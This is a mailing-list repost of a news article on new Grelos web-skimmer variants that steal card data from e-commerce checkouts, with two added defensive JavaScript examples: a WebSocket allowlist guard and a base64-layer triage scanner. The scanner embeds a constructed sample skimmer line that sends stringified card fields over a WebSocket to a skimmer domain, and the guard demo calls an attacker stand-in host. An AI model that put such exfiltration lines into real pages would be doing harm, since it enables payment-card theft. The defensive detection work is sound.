[BreachExchange] New Grelos Skimmer Variants Siphon Credit Card Data

Destry Winant destry at riskbasedsecurity.com
Tue Nov 24 10:41:46 EST 2020


https://threatpost.com/grelos-skimmer-variants-credit-card/161439/

Domains related to the new variant of the Grelos web skimmer have
compromised dozens of websites so far.

Just as seasonal online shopping kicks into high gear, new variants of
the Grelos web skimmer have been identified. The variants target the
payment-card data that shoppers enter on dozens of compromised
e-commerce sites, researchers warn. (Grelos is JavaScript injected into
checkout pages, not point-of-sale terminal malware.)

The Grelos skimmer has been around since 2015, and its original version
is associated with what are called Groups 1 and 2 under the prolific
Magecart umbrella of loosely organized cybercriminals. Over time,
however, new actors began to co-opt the Grelos skimmer and to reuse
some of the original domains that hosted it. The result, researchers
say, is an unusual overlap in infrastructure between the most recent
Grelos variants and other Magecart groups.

In a new analysis, researchers said that a cookie found on a
compromised website led to the discovery of Grelos, and that they were
then able to link the new variants to one another because they shared
hosting infrastructure and had identical WHOIS registration records.

“Recently, a unique cookie allowed RiskIQ researchers to connect a
recent variant of this skimmer to an even newer version that uses a
fake payment form to steal payment data from victims,” said
researchers with RiskIQ in an analysis this week. “Domains related to
this cookie have compromised dozens of sites so far.”

The Skimmer Variant

The first of the new variants was documented on Twitter by researcher
Affable Kraut in July 2020. This version of the skimmer has a loader
stage and a skimmer stage, both of which are base64-encoded five times
over, researchers said.

The Grelos variant discovered by Kraut also used WebSockets for
exfiltration. The WebSocket API opens a persistent, two-way channel
between a web browser and a server, so stolen form fields can be
pushed out over a single long-lived connection rather than as the
discrete HTTP requests that many monitoring tools look for. Using a
WebSocket connection to exfiltrate sensitive data is not new; it was
first observed with a Magecart Group 9 skimmer in December 2019.
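Because the skimmer runs inside the victim's page, one defensive
option is to wrap the page's own WebSocket constructor so that only
allowlisted origins can be contacted and every refused attempt is
recorded. The block below is an added example written for this page,
not code from the article, from RiskIQ or from any Magecart group; it
runs under Node.js against a stub in place of the browser's WebSocket,
and the shop and attacker host names are constructed for the demo.

```javascript
// Added example for this page (not code from the article, RiskIQ or
// Magecart): wrap the page's WebSocket constructor so that connections to
// origins outside an allowlist are refused and recorded. Runs under Node.js
// against a stub; in a browser, `root` would be `window`.

function installWebSocketGuard(root, allowedOrigins) {
  const NativeWebSocket = root.WebSocket;
  const allowed = new Set(allowedOrigins.map((o) => new URL(o).origin));
  const blocked = []; // telemetry: every refused connection attempt

  function GuardedWebSocket(url, protocols) {
    let origin;
    try {
      // Resolve relative URLs against the page, as the real constructor does.
      origin = new URL(String(url), root.location && root.location.href).origin;
    } catch (e) {
      origin = "invalid";
    }
    if (!allowed.has(origin)) {
      blocked.push({ url: String(url), origin });
      const err = new Error("WebSocket to " + origin + " refused by page policy");
      err.name = "SecurityError";
      throw err;
    }
    // Returning an object from a constructor makes `new` yield that object.
    return protocols === undefined
      ? new NativeWebSocket(url)
      : new NativeWebSocket(url, protocols);
  }

  // Preserve the prototype and readyState constants so legitimate callers
  // (instanceof checks, WebSocket.OPEN) keep working.
  GuardedWebSocket.prototype = NativeWebSocket.prototype;
  for (const k of ["CONNECTING", "OPEN", "CLOSING", "CLOSED"]) {
    GuardedWebSocket[k] = NativeWebSocket[k];
  }
  // Non-writable, non-configurable: a later script cannot simply swap the
  // guard back out with `window.WebSocket = ...`.
  Object.defineProperty(root, "WebSocket", {
    value: GuardedWebSocket, writable: false, configurable: false, enumerable: true,
  });
  return { blocked };
}

// Stub standing in for the browser's WebSocket (constructed for the demo;
// it opens no network connection).
class StubWebSocket {
  constructor(url, protocols) {
    this.url = String(url);
    this.protocols = protocols;
    this.readyState = StubWebSocket.CONNECTING;
  }
}
StubWebSocket.CONNECTING = 0;
StubWebSocket.OPEN = 1;
StubWebSocket.CLOSING = 2;
StubWebSocket.CLOSED = 3;

// A stand-in for `window` on a checkout page (constructed).
function demoRoot() {
  return { WebSocket: StubWebSocket, location: { href: "https://shop.example/checkout" } };
}

// First-party socket allowed; exfiltration to an attacker-run host refused.
// Returns the origins that were blocked.
function demo() {
  const root = demoRoot();
  const guard = installWebSocketGuard(root, ["wss://ws.shop.example"]);
  new root.WebSocket("wss://ws.shop.example/cart");
  try {
    new root.WebSocket("wss://attacker.example/collect");
  } catch (e) {
    // expected: SecurityError
  }
  return guard.blocked.map((b) => b.origin);
}
```

The hook only helps if it runs before the skimmer and if the skimmer
does not fetch a pristine constructor from a fresh iframe, so treat it
as telemetry rather than as the control. The browser-enforced
equivalent is a Content-Security-Policy with a connect-src directive
that lists the first-party WebSocket endpoint, since connect-src
governs WebSocket connections as well as fetch and XMLHttpRequest.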

Then in a separate incident, researchers investigated the threat group
Full(z) House’s recent compromise of Boom!Mobile in October. During
their investigation, researchers noticed a unique cookie, which was
connected to three additional skimming domains and several victim
domains.

These skimming domains, which included facebookapimanager[.]com and
googleapimanager[.]com, hosted a more recent variant of the Grelos
skimmer. Researchers said the connection between the cookie and the
skimmer domains piqued their interest because it is uncommon for
skimmer domains to share an identical cookie.

“These four domains have been hosted on several different IPs, but
most often they used infrastructure belonging to ASN 45102 – Hangzhou
Alibaba Advertising Co.,Ltd., a hosting provider that is currently
popular with several different Magecart actors,” said researchers.

This skimmer has a base64-encoded loader stage similar to the one
documented by Kraut, except that this loader sits under only one layer
of encoding, with an unencoded duplicate of the encoded script tag
placed below it, researchers said.

The skimmer code includes a "translate" function holding the phrases
used by the fake HTML payment form it injects into a compromised
site's checkout, among them "Pay with credit or debit card", "Check
the cardholder first name" and "We can not process your payment".

When a shopper visits a compromised website, they are presented with
the fake payment form containing these phrases. When they submit their
payment-card details, the skimmer exfiltrates them via a function that
stringifies the stolen data together with the site_id, sid and ip
values (the function also contains a telling grammatical mistake,
researchers noted, using the word "sended" rather than "sent").
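The encoding layers described above (five in the variant Kraut
documented, one in the newer variant, sometimes wrapped in a script
tag) and the strings the article calls out can be checked with a
small triage routine. The following is an added example written for
this page, not code from RiskIQ, from Kraut or from the skimmer
itself. It runs under Node.js; the sample "skimmer stage" it decodes
is a harmless stand-in constructed for the demonstration, and the
indicator names are this example's own.

```javascript
// Added example, not code from the article or from RiskIQ: peel nested
// base64 layers off an obfuscated loader/skimmer blob and scan the
// innermost payload for the indicators the article describes. Runs under
// Node.js; the sample stage below is constructed for the demo.

const MAX_LAYERS = 16; // guard against a blob that keeps decoding to base64

function stripScriptTag(s) {
  // An encoded stage is often dropped inside an inline <script> element;
  // unwrap it so the body can be tested as base64.
  const m = /^\s*<script\b[^>]*>([\s\S]*?)<\/script>\s*$/i.exec(s);
  return m ? m[1] : s;
}

function looksLikeBase64(s) {
  const t = s.replace(/\s+/g, "");
  return t.length >= 8 && t.length % 4 === 0 && /^[A-Za-z0-9+/]+={0,2}$/.test(t);
}

function mostlyPrintable(s) {
  // Stop peeling when a layer decodes to binary rather than text.
  if (s.length === 0) return false;
  let bad = 0;
  for (const ch of s) {
    const c = ch.codePointAt(0);
    if (c === 9 || c === 10 || c === 13) continue;
    if (c < 32 || c === 0xfffd) bad++;
  }
  return bad / s.length < 0.02;
}

// Indicator names are this example's own; the patterns follow the article.
const INDICATORS = [
  ["websocket-exfil", /new\s+WebSocket\s*\(/],
  ["sended-typo", /\bsended\b/],
  ["exfil-fields", /\bsite_id\b[\s\S]*\bsid\b[\s\S]*\bip\b/],
  ["fake-form-phrase", /Pay with credit or debit card|Check the cardholder first name|We can not process your payment/i],
  ["stringify", /JSON\.stringify\s*\(/],
];

function findIndicators(text) {
  return INDICATORS.filter(([, re]) => re.test(text)).map(([name]) => name);
}

function peelBase64(blob) {
  let current = stripScriptTag(blob);
  let layers = 0;
  while (layers < MAX_LAYERS && looksLikeBase64(current)) {
    const decoded = Buffer.from(current.replace(/\s+/g, ""), "base64").toString("utf8");
    if (!mostlyPrintable(decoded)) break;
    current = stripScriptTag(decoded);
    layers++;
  }
  return { layers, payload: current, indicators: findIndicators(current) };
}

function encodeLayers(text, n) {
  let s = text;
  for (let i = 0; i < n; i++) s = Buffer.from(s, "utf8").toString("base64");
  return s;
}

// Constructed stand-in for a skimmer stage (not the real Grelos code).
const SAMPLE_STAGE = [
  "var sock = new WebSocket('wss://googleapimanager[.]com/');",
  "function translate(k){return {pay:'Pay with credit or debit card'}[k];}",
  "function sendData(d){sock.send(JSON.stringify({sended:1,site_id:SITE,sid:sid,ip:ip,data:d}));}",
].join("\n");

// Five layers, as in the variant documented by Affable Kraut.
const FIVE_LAYER_BLOB = encodeLayers(SAMPLE_STAGE, 5);
// One layer inside a <script> element, as in the later variant.
const ONE_LAYER_BLOB = "<script>" + encodeLayers(SAMPLE_STAGE, 1) + "</script>";

if (typeof require !== "undefined" && require.main === module) {
  for (const blob of [FIVE_LAYER_BLOB, ONE_LAYER_BLOB]) {
    const r = peelBase64(blob);
    console.log("layers=" + r.layers + " indicators=" + r.indicators.join(","));
  }
}
```

Run against a suspicious inline script pulled from a checkout page, the
routine reports how many encoding layers it removed and which of the
article's strings appear in the clear text; a clean site's own scripts
should decode zero layers and match nothing.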

Magecart Gang

Researchers recently reported an uptick in the number of e-commerce
sites attacked by Magecart and related groups, alongside new tactics.
Magecart groups typically plant web skimmers by exploiting a
vulnerability in the site's e-commerce platform, by gaining access to
the victim's network through phishing, or by other means (it is
unclear how the operators of the Grelos skimmer are compromising
sites).

In October, one of the largest known Magecart campaigns to date took
place, with nearly 2,000 e-commerce sites hacked in an automated
campaign that may be linked to a zero-day exploit. Earlier in
September, Magecart was seen using the secure messaging service
Telegram as a data-exfiltration mechanism.

Researchers with RiskIQ, for their part, said they expect overlaps in
the infrastructure used to host various skimmers, as well as the reuse
of skimmer code, to increase in the future.

“This complex overlap illustrates the increasingly muddy waters for
researchers tracking Magecart,” they warned.
